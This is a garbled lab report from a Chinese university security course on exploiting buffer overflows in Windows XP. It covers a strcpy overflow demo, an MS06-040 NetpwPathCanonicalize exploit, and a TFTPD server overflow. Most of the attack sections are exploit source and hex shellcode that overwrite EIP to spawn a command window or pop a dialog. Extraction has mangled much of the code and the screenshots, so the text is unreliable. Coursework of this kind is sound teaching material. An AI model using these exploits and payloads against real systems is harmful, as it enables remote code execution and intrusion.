緩沖區(qū)溢出實驗報告

1、華中科技大學(xué)計算機學(xué)院信息系統(tǒng)應(yīng)用安全實驗報告實驗名稱緩沖區(qū)溢出實驗團隊成員：姓名班級學(xué)號貢獻(xiàn)百分比得分高濤信安0703班U200714975100%注：團隊成員貢獻(xiàn)百分比之和為1教師評語:.實驗環(huán)境操作系統(tǒng)：Windows XP SP3編譯平臺：Visual C+ 6.0調(diào)試環(huán)境：OllyDbg二. 實驗?zāi)康?. 掌握緩沖區(qū)溢出的原理；2. 掌握緩沖區(qū)溢出漏洞的利用技巧；3. 理解緩沖區(qū)溢出漏洞的防范措施。三. 實驗內(nèi)容及步驟1. 緩沖區(qū)溢出漏洞產(chǎn)生的的基本原理和攻擊方法緩沖區(qū)溢出模擬程序程序源代碼如下:#include "string.h"#include "

2、stdio.h"#include<windows.h>/char name="AAAAAAAAAAAAAAAA"char name="AAAAAAAAAAAAABCD"int main()char output8;strcpy(output, name);/ 內(nèi)存拷貝，如果name長度超過8，則出現(xiàn)緩沖區(qū)溢出 for(int i=0;i<8&&outputi;i+)printf("0x%x",outpu ti);printf("n");return 0;運行該程序產(chǎn)生訪問

3、異常:由于拷貝字符串時產(chǎn)生緩沖區(qū)溢出，用“ ABCD ”字符串的值覆蓋了原來EIP的值，所以main函數(shù)返回時EIP指向44434241，弓I發(fā)訪問異常。運行命令窗口的shellcodeshellcode測試代碼如下：#include "string.h"#include "stdio.h"#include<windows.h>char name="x41x41x41x41""x41x41x41x41""x41x41x41x41" / 覆蓋 ebp"x12x45xfax7f

4、"/ 覆蓋 eip , jmp esp 地址 7ffa4512"x55x8bxecx33xc0x50x50x50xc6x45xf4x6d""xc6x45xf5x73xc6x45xf6x76xc6x45xf7x63""xc6x45xf8x72xc6x45xf9x74xc6x45xfax2e" "xc6x45xfbx64xc6x45xfcx6cxc6x45xfdx6c" "x8dx45xf4x50xb8""x77x1dx80x7c" / LoadLibraryW的地址&

5、quot;xffxd0""x55x8bxecx33xffx57x57x57xc6x45xf4x73""xc6x45xf5x74xc6x45xf6x61xc6x45xf7x72""xc6x45xf8x74xc6x45xf9x20xc6x45xfax63""xc6x45xfbx6dxc6x45xfcx64x8dx7dxf4x57""xba""xc7x93xbfx77" / System的地址"xffxd2"int main()char output8

6、;strcpy(output, name);for(int i=0;i<8&&outputi;i+) printf("Ox%x",outputi);printf("n");return 0;shellcode測試代碼運行效果如下:ZJ *411Mlx417屜斗Sjax4$、帥弓9斗電Pm*a lka$ to cant Enn*ehifiHittMf UinriiM XFK.I.3AWKC)版噸際Micnroft； Gifu”二-滾怡l slkicuinent-s "d SeCt心百呂dmInli毎皿Suar例弋碼例3由于把

7、mai n函數(shù)的返回EIP地址替換成了 jmp esp的地址，ma in函數(shù)返回的時候就會執(zhí)行我們的shellcode代碼。該shellcode，運行命令窗口。2. MS06-040 緩沖區(qū)溢出漏洞分析和利用溢出點定位溢出點定位源代碼#include <windows.h>typedef void (*MYPROC)(LPTSTR); int main()char arg_10x320;char arg_20x440;int arg_3=0x440;char arg_40x100;long arg_5=44;int i=0;HINSTANCE LibHandle;MYPROC Tr

8、igger;char dll = "./netapi32.dll"char VulFunc = "NetpwPathCanonicalize"LibHandle = LoadLibrary(dll);/ 加載當(dāng)前目錄的 netapi32.dllTrigger = (MYPROC) GetProcAddress(LibHandle, VulFunc);/獲得NetpwPathCanonicalize 的調(diào)用地址先清零內(nèi)存必須使用null結(jié)束符，填充a先清零內(nèi)存必須使用null結(jié)束符，填充b/填充參數(shù)memset(arg_1,0,sizeof(arg_1);

9、/ memset(arg_1,'a',sizeof(arg_1)-2);/arg_1792='c'arg_1793='c'arg_1794='c'arg_1795='c'memset(arg_4,0,sizeof(arg_4);/memset(arg_4,'b',sizeof(arg_4)-2);/(Trigger)(arg_1,arg_2,arg_3,arg_4,&arg_5,0);調(diào)用 NetpwPathCanonicalizeFreeLibrary(LibHandle);return

10、0;程序運行效果如下:iw 11v 3 *股醸z±1抽可以看到錯誤訪問地址為63636363，即為 c'的編碼，所以成功得定位了溢出點。漏洞利用漏洞利用的源代碼如下：#include <windows.h>typedef void (*MYPROC)(LPTSTR);char shellcode="xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C""x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53""x68x75x73x

11、65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B""x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95""xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59""x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A""xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75""xE4x8Bx59x

12、24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03""x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB""x53x68x77x65x73x74x68x66x61x69x6Cx8BxC4x53x50x50""x53xFFx57xFCx53xFFx57xF8"int main()char arg_10x320;char arg 20x440;int arg_3=0x440;char arg_40x100;long arg_5=44;HINSTANCE Li

13、bHandle;MYPROC Trigger;char dll = "./netapi32.dll"char VulFunc = "NetpwPathCanonicalize"LibHandle = LoadLibrary(dll);Trigger = (MYPROC) GetProcAddress(LibHandle, VulFunc); memset(arg_1,0,sizeof(arg_1);memset(arg_1,0x90,sizeof(arg_1)-2); memset(arg_4,0,sizeof(arg_4);memset(arg_4,&

14、#39;a',sizeof(arg_4)-2); memcpy(arg_4,shellcode,168);arg_10x318=0xF9; CALL ECX 的地址 arg_10x319=0x52;arg_10x31A=0x18;arg_10x31B=0x75;(Tirigger)(arg_1,arg_2,arg_3,arg_4, &arg_5,0);FreeLibrary(LibHandle);漏洞利用的效果如下:可以看到成功的利用該漏洞，彈出了一個對話框3. TFTPD溢出漏洞分析與利用溢出點定位1. 構(gòu)造FUZZtftpgetAAAAAAAAAAAAAA

15、AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFUZZ中包含288個A，這個值是通過多次測試獲得的

16、，運行效果如下，可以看到發(fā)生了溢出：2. 確定溢出點采用284個'A' + ' 1234 '的fuzz，運行效果如下:tftpd.如pXang； tftpd.AppVar； 0 0 0. 0ModHtmt； uiXnawMcd/sr： Q. Q.Q.O Df£:«U 甌陽$231要壹看云于4舗援.葩族木信息，鑿單劑L處-(.©”飛hi r I 1F1 t 1i 11r * PI凋試® I蕪的© I I可以看到程序轉(zhuǎn)到了 34333231，溢出點定位成功。3. 程序中溢出點定位使用OllyDbg打開程序，首先找到r

17、ecvfrom 函數(shù)，方法是右鍵點擊Search for選項，找到Name in current module，在其中找到recvfrom ，Hit tra.eeG esp8)rd ptr )rd ptr IO11O0L, dworje r duor 】，esp1ci, duor )t) dwor ，espHsvr origin her色ClrltGray *QiO toFolio in DunpSearck forFind reEerences toVi ewCopy te卜AnalysisAJunkAsn>2Clipboiurdk書賽管理去除花抬令特別復(fù)制卜Run tracfe_se

18、t_app_typeName Qabel) in current nodule Ctfl+HCommandSequence o£ comnandsCcn'SimtBinary stringCtrl+F 匚trl+SCtrl+EAll intermodular callsAll coimmuidEAll sequencesAll const anName in all modulesf如下所示:dulFtpdFtpd FtpdFtpdFtpd FtpdFtpd FtpdFtpd 52_3SER3 A匚"Il nuuiI 0042I Oi：0B42A4AOidBtmIn

19、portnsucrt. pctpe0B42A71B.ldataInportUSER32,PeekMes5ageA0942A 71C.idataInportUSER32,PostNessageAOOU2A72B.idataImportUSER32.PostQui tHessage.idataImportC0NCTL32.Propert(/SheetA0Q42A47C.idataImportmsvcrt. p_enuiron0042A480.idataImportmsucrt * p_fnodeOOU2A4DC-idataInportnsvcrt *rnd0042A460idataInportns

20、vert - read0042A62C.idataInportKERNEL32.ReadFlle0042A7BQ.ldataInportWS2_32,recu0B42A7B4.idataInporti! 2 U2 recvfrom0042A?24.idataImportADUAP132.RegCloseKey.idataImportADUAP132.RegCreateKeyExAO042A74.idataImportUSER32-RegisterClaSSA0042A52CidataImportADUAPI . RegDpenKei|ExA0042A530idataImportADUAPI32

21、.RegQueryUalueExAH042A534idBtaInportADUAPI32.Reg£etUalueExA0042A630.idatInportKERNELS?.ReledseSenaphorens'L從這里找到recvfrom函數(shù)的位置，在此設(shè)置斷點:C CPU Kijh Lhx 普瞽山 MUiilulk* TS2_32amirioii?dlv pdlFT肪斡I V舟pushpbpMAT2FFAsafennuphp, “P?1ft?2FlFCB3EC1lisuhpspt iaA1ft2i?FFK53push?bxiF汕叭HiDUMBHphN* pbx八腫：盯1冊

22、KIDCHp曲跖M ptr1 /IRHITh h,71 A? n a AC56puihrsiHF 8jn?»91D5JU脯仍亡叩dMord ptr| apbx1fli2abl19 v0F euWU'jDUblUjp?1ASIS9fFF95puhflworil ptr然后啟動tftp，重新運行fuzz，程序會進(jìn)入到斷點，跟蹤程序的運行過程，發(fā)現(xiàn)程序運行到一個strcpy函數(shù)時造成溢出，如下圖所示:00406397.894424 94mouB04B639B.SDS5 E8FEFFFIleaO04O6SA1.890424ROU004063 fth.E8 4766S1OScall0O

23、4663A9.8D8S E8FEFFFILea004063AF.890424imau00>l063B2ES 693DO1O0call004D63B7.8DS5 E8FEFFFILean m. n r nrii nnn m. n i.damaged strcpydword ptr esp+UJ. eax pa壯* dword ptr ebp-118 dword ptr p, eax<jmp.ftnsucrt.strcpy> eax. duord ptr ebp-118 duord ptr esp» ?ax OO41A120eax r duord ptr ebp-118

24、運行004063A4函數(shù)之后，棧的狀態(tài)如下，可以看到 EIP被我們的數(shù)據(jù)覆蓋:1010BF3A8 01 BBF3AC D1SBF33Q010BF3B4H100F3B801QBF3BCmm mmOTSBF3C0ini in in010BF3C8ni0sr3ccI 010BF3D93H33323-10642001)0QGEB1F62010DF968ASCIT 'AAAAAAAAAAAnAAAAAAf運行到下面的代碼處，程序跳轉(zhuǎn)到 34333231處，至此溢出點定位完畢I >9885DUFDFFFImooC9leaueC3rtn55n r-b push9bp溢出漏洞利用分析 首先肯定是

25、想到利用JMP ESP,但是發(fā)現(xiàn)EIP后面是兩個函數(shù)參數(shù),如果覆蓋該參 數(shù)，將在函數(shù)返回之前觸發(fā)異常，無法 進(jìn)入到我們的shellcode 。01 0BF3C40G4131E6RETURN to tftpd.eOM31E4 fron tftpd. 004063GB610BF3IC8盹428陽9ASCII "c:tftpd-*01 0BF3GGS6E81F62從上圖也可以看出，EIP后面的第二個參數(shù)恰好指向我們構(gòu)造的字符 串，那么如果我們能夠把00E8仆62送入EIP，可以發(fā)現(xiàn)函數(shù)返回之前的 ESP指向010BF3C8，如果能夠把ESP減去4，然后運行RET指令，就可 以把00E81F

26、62送入EIP，ESP-8相當(dāng)于一次POP操作，這樣如果我們把 EIP指向有：POP XRET代碼串的指令地址，即可使得 shellcode被執(zhí)行，在系統(tǒng)DLL中搜索該指令串，發(fā)現(xiàn)在7FFC01B0處有該指令代碼：7FrC01D9POPesi7FFC01B1retn這樣就可以構(gòu)造如下的shellcode:"x55x8bxecx33xc0x50x50x50xc6x45xf4x6d"/1224"xc6x45xf5x73xc6x45xf6x76xc6x45xf7x63"/36"xc6x45xf8x72xc6x45xf9x74xc6x45xfax2e&

27、quot;/48"xc6x45xfbx64xc6x45xfcx6cxc6x45xfdx6c"/"x8dx45xf4x50xb8"/ 53"x77x1dx80x7c" / LoadLibraryW的地址/ 57"xffxd0"/ 5971"x55x8bxecx33xffx57x57x57xc6x45xf4x73"/83"xc6x45xf5x74xc6x45xf6x61xc6x45xf7x72"/95"xc6x45xf8x74xc6x45xf9x20xc6x45xfax

28、63"/"xc6x45xfbx6dxc6x45xfcx64x8dx7dxf4x57"107"xba"/ 108"xc7x93xbfx77" / System 的地址/112"xffxd2"/ 114/ 118"x90x90x90x90""x90x90x90x90x90x90x90x90x90x90"128"x90x90x90x90x90x90x90x90x90x90"138"x90x90x90x90x90x90x90x90x90x90&

29、quot;/188188148"x90x90x90x90x90x90x90x90x90x90"158"x90x90x90x90x90x90x90x90x90x90"168"x90x90x90x90x90x90x90x90x90x90"178"x90x90x90x90x90x90x90x90x90x90"/188198208218228238248258268278"x90x90x90x90x90x90x90x90x90x90"/"x90x90x90x90x90x90x90x90x90x

30、90"/"x90x90x90x90x90x90x90x90x90x90"/"x90x90x90x90x90x90x90x90x90x90"/"x90x90x90x90x90x90x90x90x90x90"/"x90x90x90x90x90x90x90x90x90x90"/"x90x90x90x90x90x90x90x90x90x90"/"x90x90x90x90x90x90x90x90x90x90"/"x90x90x90x90x90x90x90x90x90

31、x90"/"x90x90x90x90x90x90"/ 284"xB0x01xFCx7F" / EIP 地址/ 288該shellcode 為彈出一個命令窗口的 shellcode , EIP指向7FFC01B0,按照上面的分析，程序?qū)⑦\行shellcode 。漏洞利用直接在fuzz中加入EIP跳轉(zhuǎn)地址7FFC01B0，構(gòu)造fuzz如下284個A'+ 0xB0 + 0x01 + 0xFC + 0x7F，發(fā)送到服務(wù)器端，發(fā)現(xiàn)實際地址不對：A010BF3B8010DT3QC訥 imrui 1111114141016BF9C0MM 41411C

32、DI-9C11016BF3C8016BF3CC60e09F9F 4M28BB0QK&1F42ASCII "c:tftpd*"ASCII "AftAAAAftftAAftAAAAAAAAAAAAAAAAAl發(fā)現(xiàn)這是因為tftp發(fā)送的時候只能發(fā)送有效的字符，而無效的字符無 法發(fā)送過去，這樣我們必須自己實現(xiàn)tftp客戶端，程序代碼如下：#include <Winsock2.h>#include <windows.h>#include <stdio.h>/彈出命令框的Shell長度#define CMD_SHELL_LENGTH

33、 300/彈出命令框的 shellcodechar cmdshellCMD_SHELL_LENGTH + 1="x00x01"/ 2"x55x8bxecx33xc0x50x50x50xc6x45xf4x6d"/14"xc6x45xf5x73xc6x45xf6x76xc6x45xf7x63"/26"xc6x45xf8x72xc6x45xf9x74xc6x45xfax2e"/38"xc6x45xfbx64xc6x45xfcx6cxc6x45xfdx6c"/50"x8dx45xf4x50xb

34、8"/ 55"x77x1dx80x7c" / LoadLibraryW的地址/ 59"xffxd0"/ 61"x55x8bxecx33xffx57x57x57xc6x45xf4x73"/73"xc6x45xf5x74xc6x45xf6x61xc6x45xf7x72"/85"xc6x45xf8x74xc6x45xf9x20xc6x45xfax63"/97"xc6x45xfbx6dxc6x45xfcx64x8dx7dxf4x57"/ 109/ 110/ 114"

35、;xba""xc7x93xbfx77" / System的地址"xffxd2"/ 116"x90x90x90x90"/ 120"x90x90x90x90x90x90x90x90x90x90"/ 130"x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90"/ 140/ 150"x90x90x90x90x90x90x90x90x90x90"/ 160"x90x90x9

36、0x90x90x90x90x90x90x90"/ 170"x90x90x90x90x90x90x90x90x90x90"/ 180"x90x90x90x90x90x90x90x90x90x90"/ 190"x90x90x90x90x90x90x90x90x90x90"/ 200"x90x90x90x90x90x90x90x90x90x90"/ 210"x90x90x90x90x90x90x90x90x90x90"/ 220"x90x90x90x90x90x90x90x90x90x90"/ 230"x90x90x90x90x90x90x90x90x90x90"/ 240"x90x90x90x90x90x90x90x90x90x90"/ 250"x90x90x90x90x90x90x90x90x90x90"/ 260"x90x90x90x90x90x90